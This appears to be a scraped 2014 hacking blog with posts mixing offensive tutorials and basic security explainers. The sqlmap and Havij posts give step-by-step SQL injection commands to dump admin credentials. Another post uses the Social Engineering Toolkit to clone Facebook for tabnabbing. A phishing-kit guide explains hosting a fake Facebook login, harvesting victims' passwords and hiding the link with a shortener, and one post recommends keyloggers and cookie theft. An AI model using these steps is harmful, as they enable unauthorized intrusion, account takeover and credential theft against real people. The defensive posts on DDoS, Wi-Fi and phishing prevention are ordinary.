Wednesday 30 July 2014

HACK WEBSITE USING SQLMAP SQL INJECTION TOOLS FULL TUTORIAL

how to use sqlmap on GET method
- fingerprinting
first you must have a vulnerable website for
the target, if you was have a target now open
sqlmap and type this command
./sqlmap.py -u "http://www.target.com/
index.php?id=2 "
sqlmap will detect vulnerable of your target
and will tell you what the type of vulnerable
and what is the database type. and if your
target vulnerable go to next step.
- find database name
type this command to find database name
./sqlmap.py -u "http://www.target.com/
index.php?id=2 " --dbs
on this step, sqlmap will find the database
name of your target, for example I use
"web_db" for the database name.
- find tables name
after sqlmap find the databse name its time
to find the tables name. use this command to
find the table name
./sqlmap.py -u "http://www.target.com/
index.php?id=2 " -D web_db --tables
there will show you some tables name inside
"web_db" database, ok for example I use
"tbl_admin" as the tables name.
- find columns name
its time to find what inside "tbl_admin" from
"web_db" and we call it columns. to find
columns type this command
./sqlmap.py -u "http://www.target.com/
index.php?id=2 " -D web_db -T tbl_admin --
columns
it will show you the list of columns name,
for example I find "user" and "password"
columns.
- dump
this command will dumped data from the
columns, type this command
./sqlmap.py -u "http://www.target.com/
index.php?id=2 " -D web_db -T tbl_admin -C
user,password --dump
and I find "user = admin" and "password =
adminpass". now go to the web and find the
admin login.
how to use sqlmap on POST method
its the same way with GET method, its just
that you have to insert POST data to the
sqlmap. for example I have vulnerable site
on the "login.php" path. the POST data is
"id=admin&pwd=password&submit=login".
how to find the POST data ? just use "Live
HTTPheaders" its a firefox add ons.
- fingerprinting
its same way with GET method, just type this
command
./sqlmap.py -u "http://www.target.com/
login.php " --
data="id=admin&pwd=password&submit=login"
- find database name
./sqlmap.py -u "http://www.target.com/
login.php " --
data="id=admin&pwd=password&submit=login"
--dbs
- find tables name
./sqlmap.py -u "http://www.target.com/
login.php " --
data="id=admin&pwd=password&submit=login"
-D web_db --tables
- find columns name
./sqlmap.py -u "http://www.target.com/
login.php " --
data="id=admin&pwd=password&submit=login"
-D web_db -T tbl_admin --columns
- dump
./sqlmap.py -u "http://www.target.com/
login.php " --
data="id=admin&pwd=password&submit=login"
-D web_db -T tbl_admin -C user,password --
dump
include cookie
still same method but you just should insert
the cookie
./sqlmap.py -u "http://www.target.com/
index.php?id=2 " --
cookie="PHPSESSID=123asdqwe456blabla;user=admin"
or
./sqlmap.py -u "http://www.target.com/
login.php " --
data="id=admin&pwd=password&submit=login"
--
cookie="PHPSESSID=123asdqwe456blabla;user=admin"
custom parameter
if you have a custom parameter to inject you
can type "-p" like this command
./sqlmap.py -u "http://www.target.com/
login.php " --
data="id=admin&pwd=password&submit=login"
--
cookie="PHPSESSID=123asdqwe456blabla;user=admin"
-p "pwd"
sqlmap will inject "pwd" parameter. or you
can give star"*" to the parameter to inject,
like this
./sqlmap.py -u "http://www.target.com/
login.php " --
data="id=admin&pwd=*password&submit=login"
--
cookie="PHPSESSID=123asdqwe456blabla;user=admin"
cover
if you a windows users, dont use "./" to run
it on cmd.
Go To Download Software: http://sqlmap.org/
--from PH1K3!

Monday 28 July 2014

Secret Hack Codes for Android Mobile Phones

Secret Hack codes are those codes which are
usually hidden from users for any misuse and
exploit. As we all know android is very new
platform and thus very few hack codes of
androids are there on internet. Today i am
sharing all the hack codes of androids
cellphones that i know. And i surely hope you
can't find codes better than that. So friends
let's hack and explore our android Phones. I
have tested these codes on my Phone
Samsung Note having an Android OS version
2.2 . I am sure these will work on all previous
versions.
Secret Hacking codes for Android Mobile
Phones:
1. Complete Information About your Phone
*#*#4636#*#*
This code can be used to get some interesting
information about your phone and battery. It
shows following 4 menus on screen:
Phone information
Battery information
Battery history
Usage statistics
2. Factory data reset
*#*#7780#*#*
This code can be used for a factory data
reset. It'll remove following things:
Google account settings stored in your phone
System and application data and settings
Downloaded applications
It'll NOT remove:
Current system software and bundled
application
SD card files e.g. photos, music files, etc.
Note: Once you give this code, you get a
prompt screen asking you to click on "Reset
phone" button. So you get a chance to cancel
your operation.
3. Format Android Phone
*2767*3855#
Think before you give this code. This code is
used for factory format. It'll remove all files
and settings including the internal memory
storage. It'll also reinstall the phone firmware.
Note: Once you give this code, there is no way
to cancel the operation unless you remove the
battery from the phone. So think twice before
giving this code.
4. Phone Camera Update
*#*#34971539#*#*
This code is used to get information about
phone camera. It shows following 4 menus:
Update camera firmware in image (Don't try
this option)
Update camera firmware in SD card
Get camera firmware version
Get firmware update count
WARNING: Never use the first option
otherwise your phone camera will stop working
and you'll need to take your phone to service
center to reinstall camera firmware.
5. End Call/Power
*#*#7594#*#*
This one is my favorite one. This code can be
used to change the " End Call / Power " button
action in your phone. Be default, if you long
press the button, it shows a screen asking you
to select any option from Silent mode, AirPlane
mode and Power off.
You can change this action using this code. You
can enable direct power off on this button so
you don't need to waste your time in selecting
the option.
6. File Copy for Creating Backup
*#*#273283*255*663282*#*#*
This code opens a File copy screen where you
can backup your media files e.g. Images,
Sound, Video and Voice memo.
7. Service Mode
*#*#197328640#*#*
This code can be used to enter into Service
mode. You can run various tests and change
settings in the service mode.
8. WLAN, GPS and Bluetooth Test Codes:
*#*#232339#*#* OR *#*#526#*#* OR
*#*#528#*#* - WLAN test (Use
"Menu" button to start various tests)
*#*#232338#*#* - Shows WiFi
MAC address
*#*#1472365#*#* - GPS test
*#*#1575#*#* - Another GPS
test
*#*#232331#*#* - Bluetooth test
*#*#232337#*# - Shows
Bluetooth device address
9. Codes to get Firmware version
information:
*#*#4986*2650468#*#* - PDA, Phone, H/W,
RFCallDate
*#*#1234#*#* - PDA and Phone
*#*#1111#*#* - FTA SW Version
*#*#2222#*#* - FTA HW Version
*#*#44336#*#* - PDA, Phone, CSC, Build
Time, Changelist number
10. Codes to launch various Factory Tests:
*#*#0283#*#* - Packet Loopback
*#*#0*#*#* - LCD test
*#*#0673#*#* OR *#*#0289#*#* - Melody
test
*#*#0842#*#* - Device test (Vibration test
and BackLight test)
*#*#2663#*#* - Touch screen version
*#*#2664#*#* - Touch screen test
*#*#0588#*#* - Proximity sensor test
*#*#3264#*#* - RAM version

Top 4 Twitter Hacks

Looking for cool twitter hacks ? In this post I’ll
show you top 4 twitter hacks : custom twitter
backgrounds, how to do twit of more than 140
characters, how to know who has unfollowed
you, automated twitter followers
1. Custom Twitter Backgrounds
Good background themes really can add
charms in your profile. In twitter, you can
choose nineteen basic background themes as
you have no option to choose rather than
them but, it is possible to use and customize
backgrounds according to your choice. In
order to do it, you have to go to
www.tweetstyle.com and there, select your
desired theme and download it. Now, the next
step is to upload it in your twitter account. In
this way, you can set your own custom twitter
background. You can also go-to
Colourlovers.com and can create your own
custom theme as all you need to sign in your
twitter account in order to set it for twitter.
So, in-order to select background theme for
your twitter’s profile, you have to go to-
Settings- Design Menu.
2. How to do twit of more than
140 characters
Twitter doesn’t allow posting texts more than
140 characters but, it is possible to post texts
more that 140 characters by using web-site
named- TwitLonger.com . Yes, Twit Longer is an
easy way to post long messages to twitter as
write what you need at Tweet Longer and
Tweet Longer will post the link to twitter for
you.
3. How to know who has
unfollowed you
In order to know about who has un-followed
you in your twitter’s account as for it; you
have to go to www.twunfollow.com and there,
sign in by your twitter account. Now, the next
step is to enter your email-id and then, this
service will tell you information about who has
un-followed you.
4. Automated Twitter Followers
Yes, now you can get automated twitter’s
followers with the help of Free-Followers.com .
Free-Followers.com is a unique service that
allows you to automatically grow and maintain
your Twitter’s Follower base. In Free-
Followers.com, you can do-
1. Automatically searches recent tweets and
user profiles for people with similar interests.
2. Automatically Follows People with the same
interests.
3. Automatically Un-Follows those Twitter
users that don’t follow you back, this helps
maintain a balance between followers and
following.
So, free-followers.com is a great way in-order
to increase your twitter followers and manage
your twitter account.
Finally, these above twitter features are really
interesting to do. I hope you like this page

100+ Best Run Commands List Cmd Hacking Tricks>>Click Here

1. Accessibility Options : access.cpl
2. Add Hardware : hdwwiz.cpl
3. Add / Remove Programs : appwiz.cpl
4. Administrative Tools : control admintools
5. Automatic Updates : wuaucpl.cpl
6. Wizard file transfer Bluethooth : fsquirt
7. Calculator : calc
8. Certificate Manager : certmgr.msc
9. Character : charmap
10. Checking disk : chkdsk
11. Manager of the album (clipboard) : clipbrd
12. Command Prompt : cmd
13. Service components (DCOM) : dcomcnfg
14. Computer Management : compmgmt.msc
15. DDE active sharing : ddeshare
16. Device Manager : devmgmt.msc
17. DirectX Control Panel (if installed) : directx.cpl
18. DirectX Diagnostic Utility : dxdiag
19. Disk Cleanup : cleanmgr
20. System Information : dxdiag
21. Disk Defragmenter : dfrg.msc
22. Disk Management : diskmgmt.msc
23. Partition manager : diskpart
24. Display Properties : control desktop
25. Properties of the display (2) : desk.cpl
26. Properties display (tab "appearance") : control
color
27. Dr. Watson : drwtsn32
28. Manager vérirficateur drivers : check
29. Event Viewer : Eventvwr.msc
30. Verification of signatures of files : sigverif
31. Findfast (if present) : findfast.cpl
32. Folder Options : control folders
33. Fonts (fonts) : control fonts
34. Fonts folder windows : fonts
35. Free Cell : freecell
36. Game Controllers : Joy.cpl
37. Group Policy (XP Pro) : gpedit.msc
38. Hearts (card game) : mshearts
39. IExpress (file generator. Cab) : IExpress
40. Indexing Service (if not disabled) : ciadv.msc
41. Internet Properties : inetcpl.cpl
42. IPConfig (display configuration) : ipconfig / all
43. IPConfig (displays the contents of the DNS
cache) : ipconfig / displaydns
44. IPConfig (erases the contents of the DNS
cache) : ipconfig / flushdns
45. IPConfig (IP configuration cancels
maps) : ipconfig / release
46. IPConfig (renew IP configuration
maps) : ipconfig / renew
47. Java Control Panel (if present) : jpicpl32.cpl
48. Java Control Panel (if present) : javaws
49. Keyboard Properties : control keyboard
50. Local Security Settings : secpol.msc
51. Local Users and Groups : lusrmgr.msc
52. Logout : logoff
53. Microsoft Chat : winchat
54. Minesweeper (game) : winmine
55. Properties of the mouse : control mouse
56. Properties of the mouse (2) : main.cpl
57. Network Connections : control NetConnect
58. Network Connections (2) : ncpa.cpl
59. Network configuration wizard : netsetup.cpl
60. Notepad : notepad
61. NView Desktop Manager (if
installed) : nvtuicpl.cpl
62. Manager links : packager
63. Data Source Administrator
ODBC : odbccp32.cpl
64. Screen Keyboard : OSK
65. AC3 Filter (if installed) : ac3filter.cpl
66. Password manager (if present) : Password.cpl
67. Monitor performance : perfmon.msc
68. Monitor performance (2) : perfmon
69. Dialing Properties (phone) : telephon.cpl
70. Power Options : powercfg.cpl
71. Printers and Faxes : control printers
72. Private Character Editor : eudcedit
73. Quicktime (if installed) : QuickTime.cpl
74. Regional and Language Options : intl.cpl
75. Editor of the registry : regedit
76. Remote desktop connection : mstsc
77. Removable Storage : ntmsmgr.msc
78. requests the operator to removable
storage : ntmsoprq.msc
79. RSoP (traduction. ..) (XP Pro) : rsop.msc
80. Scanners and Cameras : sticpl.cpl
81. Scheduled Tasks : control schedtasks
82. Security Center : wscui.cpl
83. Console management services : services.msc
84. shared folders : fsmgmt.msc
85. Turn off windows : shutdown
86. Sounds and Audio Devices : mmsys.cpl
87. Spider (card game) : spider
88. Client Network Utility SQL server : cliconfg
89. System Configuration Editor : sysedit
90. System Configuration Utility : msconfig
91. System File Checker (SFC =) (Scan Now) : sfc /
scannow
92. SFC (Scan next startup) : sfc / scanonce
93. SFC (Scan each démarraget) : sfc / scanboot
94. SFC (back to default settings) : sfc / revert
95. SFC (purge cache files) : sfc / purgecache
96. SFC (define size CAHC x) : sfc / cachesize = x
97. System Properties : sysdm.cpl
98. Task Manager : taskmgr
99. Telnet client : telnet
100. User Accounts : nusrmgr.cpl
101. Utility Manager (Magnifier, etc) : utilman
102. Windows firewall (XP SP2) : firewall.cpl
103. Microsoft Magnifier : magnify
104. Windows Management
Infrastructure : wmimgmt.msc
105. Protection of the accounts database : syskey
106. Windows update : wupdmgr
107. Introducing Windows XP (if not
erased) : tourstart
108. Wordpad : write
109. Date and Time Properties : timedate.cpl

Computer Hacking in the New Age, All you Need to Know about Hacking Today

Every human discovery has pros and cons, so
is the computer which has pervaded all our
lives. The modern humanity is increasingly
dependent on computer for various day-to-
day activities. Computers do us a whole lot of
good things, but it is not without some
pitfalls. With the extensive use of internet for
hundreds of our needs, computer opens a
vicious cycle of hackers. Computer hacking is
a term which refers to an individual’s illegal
and unauthorized access to the data which are
stored in a user’s system. This is done to
disturb the confidentiality and security of the
user’s computer.
The hackers focus on individuals’ computer
system when they are online. As long as you
are not connected to internet you are less
prone to hacking. The access to internet has
actually made computer hacking easy. You
must protect your computer with strong
antivirus and firewall programs to keep
hackers away. Hackers are known for creating
problems which are difficult to solve. This
gives a good business to computer
investigators and technicians. Hacking can be
done in lots of ways. Few of them are given
below:
Worms: These are the
programs which propagate
through networks.
Trojans: These are hidden in
websites, attached files and
emails.
Viruses: These attach
themselves to various kinds of
files. They can damage certain
functions of your computer.
Hackers also crash on wireless networks which
do not have firewall installed and enabled.
They can also send email attachments with
malicious software which get embedded on
the victim’s computer. Hackers attack
accounts which have weak passwords. All
these are done to get access to confidential
and sensitive information of the users.
Whatever is the method of hacking, the effect
is harmful for the user. Your system will be
flooded with viruses, malwares which steal
your information. In order to avoid hacking
one has to make sure that the systems at
home or office have the latest anti-virus
program and firewall installed and enabled.
These programs need to be regularly updated.
Use the latest browser and scan your
computer on a regular basis.
The New Age of internet has brought with it
many risk factors along with umpteen
advantages. The New Age is the time where
our personal lives are no longer very
personal, but people are able to access
personal information of internet users from
various sources in the virtual world. We need
to be careful about usernames and passwords,
else it will lead to dangerous consequences.
Universities, large companies and government
agencies are mostly targeted by hackers
simply because of the bulk of information
they handle. The great newspapers like The
Wall Street Journal and The New York Times
were also targeted by hackers.
Computer hackers are people who gain
remote access to information stored in a
system elsewhere. During the 1950s and 60s
hackers were more drawn towards learning
the operations of a computer rather than
stealing confidential information of a remote
user. Unlike the olden days, now computer
hacking has become more sophisticated and
organized. In the late 1990s hackers tried to
get access to files in the network of Pentagon.
Some more expert hackers gained access to
the patent files at the Indiana University
School of Medicine in February 2003. Many
hackers were sentenced in the history since
hacking represents a potential national
security threat.
One major tool hackers use to steal
information from computer systems is the
use of viruses. Over the years the number of
viruses has increased drastically. The virtual
world now has above 100000 viruses and the
number grows virtually every day. Apart from
the threat the computer hackers pose, they
also can be beneficial in one way. They can
bring to light the flaws in a computer
network. Hackers can help in redesigning the
system and in making information inaccessible
to illegal users and to unauthorized access.
Getting a log in password is one of the
predominant ways to get access to a
computer which is by the side of the hacker.
Getting remote access to a computer is
another way to hack a system. Managing to
crack a Wi-Fi password is the third method of
sneaking into someone else’s system. Hacking
if done on a public or school computer will
have serious consequences. The hacker will be
put behind the bars for illegally accessing the
computer which does not belong to him or
her.

Tabnabbing Attack with social Engineering toolkit on Backtrack | kali

Hi everyone here is the post that basically
explain about very fundamental attack known
to be tab nabbing attack.the attack is very
simple again you sent an link to the victim
he/she click on it and redirected to your
desired login page which looks like original
and the after putting his/her credentials you
get that in no time .
so lets do this with social engineering toolkit
as here more social engineering trick is very
necessary .
So before doing all do check your own BT/
Kali System IP address by typing ifconfig
command.
then Open Your Backtrack terminal and Type
cd /pentest/exploits/set
Now Open Social Engineering Toolkit (SET) ./
set
after that choose social engineering attack
that is option 1 and then choose option 2,
“Website Attack Vectors”.
a list of options will be populated you have
to select option 4 “Tabnabbing Attack
Method”.
next choose option 2 “Site Cloner”.
it will ask for your system ip which you can
give that you got from ifconfig (your
backtrack machine ip)
Then Enter the URL of the site you want to
clone. In this case http://www.facebook.com
and hit enter. SET will clone up the web site.
And press return to continue.
Now convert your URL into Google URL using
goo.gl and send this link address to your
victim via Email or Chat or any other social
way you can make it reach to victim.
When victim open in their browser it should
be a message that the page is still loading. so
victim start to open another tab. As soon as
victim open new tab, our fake website start
working. That script will redirect the victim
to the phishing page your derived.

3 Basic Tips to Prevent A DDoS Attack

Distributed denial-of-service (DDoS) attacks
are always in top headlines worldwide, as
they are plaguing websites in banks, and
virtually of almost every organization having
a prominent online presence. The main cause
behind the proliferation of DDoS attacks is
that there is a very low-cost that the attacker
has to incur to put such attack in motion.
Fortunately, today various prevention
methods have been developed to tackle such
attacks. Before delving further into
understanding about the ways to prevent
DDoS attack, let’s first understand what
exactly a DDoS attack is!
Understanding DDOS Attack
A DDoS (distributed denial-of-service) attack
is an attempt made by attackers to make
computers’ resources inaccessible to its
anticipated user. In order to carry out a
DDOS attack the attackers never uses their
own system; rather they create a network of
zombie computers often called as a “Botnet”
– that is a hive of computers, to incapacitate
a website or a web server.
Let’s understand the basic idea! Now, the
attacker notifies all the computers present
on the botnet to keep in touch with a
particular site or a web server, time and
again. This increases traffic on the network
that causes in slowing down the speed of a
site for the intended users. Unfortunately, at
times the traffic can be really high that could
even lead to shutting a site completely.
3 Basic Tips to Prevent a DDoS Attack
There are several ways to prevent the DDOS
attack; however, here in this guest post I’ll
be covering three basic tips that will help
you to protect your website from the DDoS
attack
1. Buy More Bandwidth.
One of the easiest methods is to ensure that
you have sufficient bandwidth on your web.
You’ll be able to tackle lots of low-scale
DDOS attacks simply by buying more
bandwidth so as to service the requests. How
does it help? Well, distributed denial of
service is a nothing more than a game of
capacity. Let’s suppose you have 10,000
computer systems each distributing 1 Mbps
directed towards your way. This means
you’re getting 10 GB of data that is hitting
your web server every second. Now, that’s
causes a lot of traffic!
So to avoid such issue, you need to apply the
same rule intended for normal redundancy.
According to this technique, if you wish to
have more web servers just multiply around
diverse datacenters and next make use of
load balancing. By spreading your traffic to
various servers will help you balance the load
and will most likely create large space
adequate to handle the incessant increase in
traffic.
However, there’s a problem with this method
that is buying more bandwidth can be a
costly affair. And as you’ll know that the
current DDoS attacks are getting large, and
can be a lot bigger exceeding your budget
limit.
2. Opt for DDoS Mitigation Services.
A lot of network or Internet-service
providers render DDoS mitigation
capabilities. Look for an internet service
provider having the largest DDoS protection
and mitigation network, automated tools,
and a pool of talented anti-DDoS technicians
with the wherewithal to take action in real-
time as per the varying DDoS attack
characteristics. A viable alternative is to
utilize a DDoS prevention appliance, which is
specifically intended to discover and prevent
distributed denial-of-service attacks.
3. Restricted Connectivity.
In case you have computer systems that are
connected to the web directly, a better idea
is to properly install/configure your routers
and firewall so as to limit the connectivity.
For an instance, while receiving some data
from a client machine you can only allow
traffic to pass from the machine only on a
few chosen ports (like HTTP, POP, SMTP etc.)
via the firewall.
Wrapping Up!
Websites are largely getting attacked by
hackers every second. Denial-of-service
attack is insanely getting huge and is
creating a lot of problems for business
organizations having strong online vicinity.
In this guest post you’ll not only understand
what a DDoS attack actually means, but will
also come to know about a few type of
methods to prevent DDoS attacks.
Aforementioned are three tips that I’ll
recommend you to run through to at least
understand where to get started towards
building a resilient web network with
chances of surviving a DDoS attack.

How do wireless networks work?

As the name suggests, wireless networks,
sometimes called Wi-Fi, allow you to connect
to the internet without relying on wires. If
your home, office, airport or even local
coffee shop has a wireless connection, you
can access the network from anywhere that
is within the wireless area.
Wireless networks rely on radio waves rather
than wires to connect computers to the
internet. A transmitter, known as a wireless
access point or gateway, is wired into an
internet connection. This provides a "hot
spot" that transmits the connectivity over
radio waves.
Hotspots have identifying information,
including an item called an SSID, that allows
computers to locate them. Computers that
have a wireless card and have permission to
access the wireless frequency can take
advantage of the network connection. Some
computers may automatically identify open
wireless networks in a given area, while
others may require that you locate and
manually enter information such as the SSID.
What security threats are associated with
wireless networks?
Because wireless networks don't require a
wire between a computer and the internet
connection, it's possible for attackers who
are within range to hijack or intercept an
unprotected connection. A practice known as
war driving involoves individuals equipped
with a computer, wireless card and a GPS
device driving through areas in search of
wireless networks and identifying the specific
coordinates of a network location. This
information is then usually posted online.
What can you do to minimize the risks to
your wireless network?
Change default passwords.
Restrict access. Only allow authorized users
to access your network.
Encrypt data on your network. WEP (Wired
Equivalent Privacy) and WPA (Wi-Fi Protected
Access) both encrypt information on wireless
devices. Encrypting data prevents anyone
who might be able to access your network
from viewing your data.
Protect your SSID. To avoid outsiders easily
accessing your network, avoid publicizing
your SSID. Consult your user documentation
to see if you can change the default SSID to
make it more difficult to guess.
Install a firewall. While it's good practice to
install a firewall on your network, you
should also install a firewall directly on your
wireless devices. Attackers who can directly
tap into your wireless network may be able
to circumvent your network firewall- a host-
based firewall will add an extra layer of
protection.
Maintain your anti-virus software.

What Is Encryption

Encryption is a method or a technique used
to encode a message so that it can’t be read
by a normal user/person. Its an art of secret
writing, It can also be defined as converting
information from plain text using an
algorithm or a cipher to make it unreadable,
So that the converted information can only
be read by the person who is having the
special knowledge. The process of encoding
is known as Encryption and its reverse
process i.e. decoding it is known as
Decryption. Encryption is very useful when it
comes to protecting your confidential data
from being stolen. It is helpful when data is
transmitted over the network, it safe guards
you data from sniffers. When data is needed
to be encrypted over a network, SSL
Protocol is used for encryption purpose. SSL
stands for Secure Socket Layer.
Types of Encryption
Symmetrical Key : This type of encryption is
also know as Shared Key Secret. In
symmetrical encryption, the key which is
used in the process of encryption, that same
key is also used in the process of decryption.
If two parties want to exchange the
encrypted data securely, both of them
should have the same copy of symmetric
key.
Asymmetrical Key : This type of encryption is
also know as Public Key. In this type of
encryption, keys are generated in pairs,
public key and private key. In asymmetrical
encryption key used to encipher is different
from the key used to decipher. Therefore the
two partners have two different keys, one is
made public and other one is made private.
Let’s take up an example to understand the
concept in an easy way.
Suppose, John wants to send a message to
Mike, he just ciphers the message with the
public key and sends it to Mike. Since Mike
is having the secret key, he can and decipher
the message and read its content.

Tuesday 22 July 2014

Phishing For Beginners :

1] The act of sending an Email to a
user falsely claiming to be an
established legitimate enterprise in an
attempt to scam the user into
surrendering private information that
will be used for identity theft.
2] The Email directs the user to visit a
Web site where they are asked to
update personal information, such as
passwords and credit card, social
security, and bank account numbers,
that the legitimate organization already
has. The Web site, however, is Bogus
and set up only to steal the User’s
information.
Phishing scams could be
1] Emails inviting you to join a Social
Group, asking you to Login using your
Username and Password.
2] Email saying that Your Bank Account
is locked and Sign in to Your Account
to Unlock IT.
3] Emails containing some Information
of your Interest and asking you to
Login to Your Account.
4] Any Email carrying a Link to Click and
asking you to Login.
Prevention against Phishing
1] Read all the Email Carefully and
Check if the Sender is Original
2] Watch the Link Carefully before
Clicking
3] Always check the URL in the Browser
before Signing IN to your Account
4] Always Login to Your Accounts after
opening the Trusted Websites, not by
Clicking in any other Website or Email

Useful Hacking Tools you might not know

1. Maltrieve:
Maltrieve retrieves malware directly from the
location where the bad guys serve it. This
allows researchers to acquire fresh samples,
verify detection systems, and research
infrastructure. Maltrieve includes proxy
support, multi-threading, Cuckoo submission,
and categorization. The tool is community-
developed and available under the terms of
the GNU General Public License. Website:
https://github.com/technoskald/maltrieve
2. ShinoBOT Suite:
The new tool, ShinoBOT Suite, is a total
malware package which contains the RAT
simulator, downloader, dropper, encryptor,
CandC server, decoy files, etc. All of them
are customizable.
You can create your own malware by
ShinoBOT suite and it can be used to
simulate the recent targeted attack. The new
ShinoBOT works also on the standalone /
offline environment. You might find out
more about it here:
http://www.slideshare.net/Sh1n0g1/
introduction-of-shinobot-black-hat-
usa-2013-arsenal
3. Viproy Voip Pen-Test Kit:
It is developed to improve the quality of
VoIP Penetration Tests. First version of
Viproy had SIP trust hacking, SIP proxy
bounce scan and advanced SIP attacks.
Viproy 2.0 will provide improved SIP
penetration testing features such as TCP, TLS,
vendor (Cisco, Microsoft Lync) supports and
multi-thread fixes. Furthermore, the new
version will have Cisco Skinny protocol and
Cisco HCS (VOSS) server supports to initiate
unauthorised call redirection attacks, speed
dial manipulation, unauthorised calls using
Skinny and information gathering attacks.
Website: http://www.viproy.com/

Monday 21 July 2014

If You Truly want to become a true hacker:-

1) Never trust sites that ask you for money
in return of Hacking Softwares or who claim
to Hack Email Id’s in return of money. All
such things are Scam . Nothing Works.
2) There is NO DIRECT SOFTWARE to Hack
Facebook , Google , Yahoo or any other big
website. All the softwares that claim to do so
are scam. They are just meant to take your
money and in worse cases, those softwares
have trojans or keyloggers in them. As a
result your account gets hacked trying to
hack others.
3) NEVER EVER use the keyloggers or trojans
you find as freeware on internet. Hackers are
not fools. They compile keyloggers and
trojans almost with any such software and
when you install them , you are already
hacked before even trying to hack others.
4) You are never going to be a good hacker
without the knowledge of programming and
scripting languages. When you are going to
use only ready made softwares and would
depend on them for hacking anything then
your functionality would be limited upto the
functionality of the software. When you are
not going to use your brain , just doing the
copy paste thing, then how can you even
think of being a good hacker.
5) If you are a good Hacker, you already
become a good programmer , a good script
writer , a good web developer and an
excellent security expert. Well any good
Hacker will/should have good knowledge of
various aspects and programming languages.
to do XSS (Cross Site Scripting ) , PHP
INJECTION , SQL INJECTION , PHISHING ,
FOOTPRINTING etc… you will have to be
good at programing and scripting. And when
you know the Various loop holes ,
vulnerabilities and security tips, you already
become a Computer Security Expert.
So Never Ever Under estimate the term
Hacker. A Hacker Is Not a person who just
hacks email id’s or servers but a True Hacker
is a Computer Genius who the knowledge of
computers more than anyone.

How you can hack website using sql injection havij

Just Follow these easy steps :-
1. First download havij from
here
http://itsecteam.com/
2. Run Havij SQL Injection
software and copy and paste
vulnerable website link
3. Now click in the “Analyze”
Button
4. Then It shows some
messages there. Be alert on it
and be show patience for
sometime to find it’s
vulernable and type of
injection and if db server is
mysql and it will find database
name.Then after get it’s
database is name like
xxxx_xxxx
5. Then Move to another
operation to find tables by
clicking “tables” as figure
shown. Now click “Get tables”
Then wait some time if needed
6. After founded the
tables ,you can see there will
be “users” Put mark on it and
click in the ” get columns ” tab
7. In that Just put mark
username and password and
click “Get data”
8. Finally you got now
username and password of the
admin…

FACEBOOK HACKING METHODS .

.
.
.I will cover 4 methods over here:
1. Facebook Phishing
2. Keylogging
3. Social engineering
4. Primary email address hack
Facebook phishing:
I have taken this method first because i think
this is the most popular method/way of
hacking facebook. I studied various facebook
surveys taken on web about hacking
facebook. The results of these surveys show
"Phishing" as the most used method to hack
facebook and to note…"Phishing is favorite
method of facebook hackers". So, friends..
beware of facebook Phishing. Facebook staff
is working hard to avoid these Facebook
phishers. Phishing not only allows you to
hack Facebook but also almost any email
account. You have to only get the trick used
to make a phisher, which i think is very easy.
I learnt it without any difficulty. But,
remember, this is only for educational
purpose. I will not extend this topic over
here as i have added more on Phishing in my
article How to hack facebook password
Keylogging:
This is my second favorite, as only thing you
have to do is remotely install a keylogger
application (if you don't have any physical
access to victim computer). Keylogging
becomes more easy if you have physical
access to victim computer as only thing you
have to do is install a keylogger and direct it
to your destination so that it will send all
recorded keystrokes to pointed destination.
What a keylogger does is it records the
keystrokes into a log file and then you can
use these logs to get required Facebook
password and thus can hack facebook
password. I have posted detailed information
of top keyloggers in the trade for more
information see my password hacking
softwares section
3. Social engineering:
This sounds to be pretty not working at
beginning. Even I was neglecting this way.
But, once, I thought of using it against my
friend on Facebook and i got his Facebook
password very easily by this method. I think
many of you might be knowing how what this
social engineering, For newbies, social
engineering is method of retrieving password
or answer of security question simply be
quering with the victim. You have to be very
careful while using this as victim must not be
aware of your intention. Just ask him
cautiously using your logic.
4.Primary email address hack
If Facebook hacker, by some means, hacks
your gmail or yahoo account which you are
using as primary email address, then this
Facebook hacker can easily hack your
Facebook password using "Forgot password"
trick. He will simply ask Facebook to send
password reset email to your primary email
address- which is already hacked. Thus, your
Facebook account password will be reset and
it will be hacked !!!
So, always remember to protect your
Facebook primary email address and try to
keep unknown or useless mail id as your
primary email address
So far, i found these Facebook hacking
methods as best and working ways to hack
facebook account passwords. I never
encourage hacking Facebook or any email
account,,I just wanna make you aware about
Facebook dangers online. I will appreciate
your effort if you mention any other
Facebook hacking method.
5. Facebook Cookie Stealing
I am updating this post with a new method
which is being used to hack facebook
accounts, which I think is very effective,
Facebook cookie stealing is becoming
popular day by day.The cookie which
facebook uses to authenticate it's users is
called "Datr", If an attacker can get hold of
your authentication cookies, All he needs to
do is to inject those cookies in his browser
and he will gain access to your account

Sunday 20 July 2014

HOW TO HACK FACEBOOK PASSWORD USING PHISHING METHOD WITH EASY AND SIMPLE

STEPS :
____________________________________________________
EASY TECHNIQUE :-
-------------------------
Phishing is the most widely used hacking
method for hacking Facebook passwords. The
most widely used technique in phishing is
the use of Fake Login Pages, also known as
spoofed pages. These fake login pages
resemble the original login pages of sites
likeYahoo , Gmail, MySpace etc. The victim is
fooled to believe the fake facebook page to
be the real one and enter his/her password.
But once the user attempts to login through
these pages, his/her facebook login details
are stolen away. However phishing requires
specialized knowledge and high level skills to
implement. So I recommend the use of
Phishing to hack facebook account since it is
the easiest one.
Here is a tutorial about phishing.>>
Step 1)
First you must sign for a free webhosting
service like www.byethost.com or
www.000webhost.com And register your
subdomain.
after signing you will have a subdomain like
www.yourname.byethost.com
Step 2)
Now login to your account go to "control
panel" then in site management option go to
"online file manager" and open the folder
"htdocs".
Step 3)
DOWNLOAD THE FILE to your computer add
extract the file. Inside the folder you will
find three files index.php and hello.php and
login_again.htm.
-------------------------------------------------------------------
LINK:- http://goo.gl/uEVrul
--------------------------------------------------------------------
Step 4)
Now replace the index.php file in the
"htdocs" of the "online file manager" with
the file index.php of the phisher folder in
your computer and also upload hello.php
and login_again.htm files in "htdocs" thats it!
you are done.
Step 5)
Now your homepage
www.yourname.byethost.com has become a
phisher. open it, you will see that your page
www.yourname.byethost.com has become
the login page of the site you want to
hack.now all you have to do is send this link
to the person whose account you want to
hack.when he tries to login through it you
will receive a file password.html in your
"htdocs" folder of your account which
contains the username and password of your
victim.
Step 6)
Go to http://www.yourname.byethost.com/
lol.htm for see the stored passwords !
Master Tips :- The attacker must have a very
good convincing power to hack the facebook
password with this method. Please try this
method carefully as now it is widely known
and the target may soon guess the attacker's
intentions. The target may report the fake
site and you may get in trouble.
The facebook not allow to share your fake
facebooksite on facebook. You can use
Domain hiding system to share your fake
facebook site. (Eg: http://goo.gl/ )
use above link to short your phishing url to
be short so no can catch you

Saturday 19 July 2014

Facebook Login Levels

Facebook uses a 4 Level Facebook login
procedure which makes it difficult to hack
Facebook using all other techniques except
Social Engineering and Cross Site Scripting.
